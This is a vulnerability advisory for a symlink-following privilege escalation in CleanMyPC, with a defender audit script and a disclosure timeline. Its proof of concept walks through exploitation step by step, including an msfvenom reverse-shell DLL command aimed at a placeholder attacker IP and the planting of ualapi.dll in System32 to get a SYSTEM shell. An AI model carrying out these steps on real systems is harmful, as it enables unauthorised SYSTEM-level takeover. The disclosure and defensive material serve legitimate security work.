Vulnerability Summary
CleanMyPC generates multiple files in C:\ProgramData\MawPaw Inc\CleanMyPC\Settings\Backup while running as NT AUTHORITY\SYSTEM. These files are created with an overly permissive DACL that grants Full Control to the Everyone group. As a result, a low-privileged user can delete them and replace the directory contents with a symbolic link that points into a protected location such as C:\Windows\System32. When the SYSTEM-level component regenerates a backup file, it follows the link and creates the file inside C:\Windows\System32 instead. An attacker can turn this arbitrary file creation into a DLL planted in C:\Windows\System32 and obtain code execution as SYSTEM.
Product Home Page
CVSSv3.1 Score
7.8 — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-59: Improper Link Resolution Before File Access (‘Link Following’)
Version Affected
CleanMyPC versions up to and including 1.12.2.2178, the latest release as of November 1, 2024.
Proof of Concept
- Generate a reverse shell DLL payload with msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=[attacker_ip] LPORT=[attacker_port] -f dll -o ualapi.dll. The name matters: ualapi.dll is not present in System32 on a clean install, and the Print Spooler service (spoolsv.exe) tries to load it from there when it starts, so a copy in System32 gets loaded as SYSTEM.
- Delete every file in the C:\ProgramData\MawPaw Inc\CleanMyPC\Settings\Backup directory (the Everyone: Full Control DACL allows this from a low-privileged account, and the directory must be empty for the next step).
- Use CreateSymlink.exe from Google Project Zero's SymbolicLink-Testing-Tools to create a symbolic link at C:\ProgramData\MawPaw Inc\CleanMyPC\Settings\Backup\Settings.dat.0.bak that points to C:\Windows\System32\ualapi.dll. The tool needs no privilege: it turns the directory into a mount point to the \RPC Control object directory and places an object-manager symbolic link there.
- Wait a few seconds for CleanMyPC's SYSTEM component to regenerate Settings.dat.0.bak. The write follows the link, so the file is created as C:\Windows\System32\ualapi.dll.
- Once the file exists in System32, overwrite ualapi.dll with the payload DLL. This works from the low-privileged account because the application applies the same permissive DACL to the file it creates.
- Reboot the system. The Print Spooler service loads the planted DLL at startup, and you should receive a reverse shell with SYSTEM privileges.
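The following PowerShell script is an added example for defenders and is not part of the original advisory or of MacPaw's code. It checks a host for the precondition the advisory describes (broad principals holding write or delete rights on the backup directory and its files), for the artefacts the PoC leaves behind (a reparse point in the backup directory, an unexpected ualapi.dll in System32), and can optionally tighten the directory DACL since no vendor fix is planned. The two paths are taken from the advisory; the principal list, the rights mask, the hardening ACL and the -Harden switch are assumptions made for this example.

```powershell
#requires -Version 5.1
<#
  Added example (not from the advisory or MacPaw): audit the CleanMyPC backup
  directory for the weak DACL described above, look for signs that the
  link-following primitive has been used, and optionally harden the directory.
  Paths come from the advisory; the principal list, rights mask and hardening
  ACL are assumptions. Run as a normal user to audit; elevated with -Harden to fix.
#>
[CmdletBinding()]
param(
    [string]$BackupDir = 'C:\ProgramData\MawPaw Inc\CleanMyPC\Settings\Backup',
    [string]$HijackDll = 'C:\Windows\System32\ualapi.dll',
    [switch]$Harden
)

# Principals that should never hold write/delete rights on SYSTEM-created state.
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
# Any one of these rights lets a low-privileged user delete or replace the object.
$DangerousRights = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'

function Get-WeakAce {
    # Emits one object per Allow ACE that grants a broad principal a dangerous right.
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $DangerousRights) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

if (-not (Test-Path -LiteralPath $BackupDir)) {
    Write-Host "Backup directory not found: $BackupDir"
    return
}

# 1. Weak DACLs on the directory itself and on every file it currently holds.
$targets = @(Get-Item -LiteralPath $BackupDir) + @(Get-ChildItem -LiteralPath $BackupDir -Force)
$weak = foreach ($t in $targets) { Get-WeakAce -Path $t.FullName }
if ($weak) {
    Write-Warning 'Overly permissive ACEs found:'
    $weak | Format-Table -AutoSize | Out-String | Write-Host
} else {
    Write-Host "No broad-principal write access on $BackupDir"
}

# 2. Exploitation artefacts: the primitive turns the emptied backup directory into
#    a mount point and plants an object-manager symlink where a .bak file should
#    be, so any reparse point in this tree is suspicious.
foreach ($t in $targets) {
    if ($t.Attributes -band [System.IO.FileAttributes]::ReparsePoint) {
        Write-Warning "Reparse point at $($t.FullName) (LinkType=$($t.LinkType), Target=$($t.Target))"
    }
}

# 3. The DLL the PoC plants. It is absent from System32 on a clean install and is
#    loaded by the Print Spooler service at start, so its presence (and above all
#    an unsigned copy) deserves a look regardless of which product created it.
if (Test-Path -LiteralPath $HijackDll) {
    $sig = Get-AuthenticodeSignature -FilePath $HijackDll
    Write-Warning "$HijackDll exists (signature: $($sig.Status)); review it before the next reboot"
    Get-WeakAce -Path $HijackDll | Format-Table -AutoSize | Out-String | Write-Host
}

# 4. Optional hardening (elevated shell required). Converting the directory into a
#    mount point needs write access to the directory itself, so removing Everyone
#    and limiting Users to read blocks the primitive even though CleanMyPC keeps
#    regenerating the files with its own DACL. The grant list is an assumption;
#    widen it if the user-mode UI turns out to need write access here.
if ($Harden) {
    # Grant explicit ACEs first so the directory stays reachable once inheritance goes.
    icacls.exe $BackupDir /grant:r 'NT AUTHORITY\SYSTEM:(OI)(CI)F' 'BUILTIN\Administrators:(OI)(CI)F' 'BUILTIN\Users:(OI)(CI)RX' /T /C
    icacls.exe $BackupDir /inheritance:r /remove:g Everyone /T /C
}
```

Run it without arguments from any account to audit; the audit only reads ACLs and attributes. For ongoing detection, a FileCreate event (Sysmon Event ID 11) for ualapi.dll under C:\Windows\System32, or any file created by the CleanMyPC service outside its ProgramData tree, is the signal that the link was followed.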
PoC Video
Timeline
15–08–2024 — Vulnerability discovered and details disclosed to the MacPaw security team.
12–09–2024 — The security team acknowledged the vulnerability disclosure.
23–09–2024 — The security team requested additional details of the vulnerability.
26–09–2024 — Further details for reproducing the vulnerability were sent.
31–10–2024 — Followed up on the status of the fix.
1–11–2024 — The security team responded that CleanMyPC was no longer actively developed and that only critical issues would be addressed. Since they did not consider this issue critical, they decided to postpone the fix.
2–11–2024 — Public Disclosure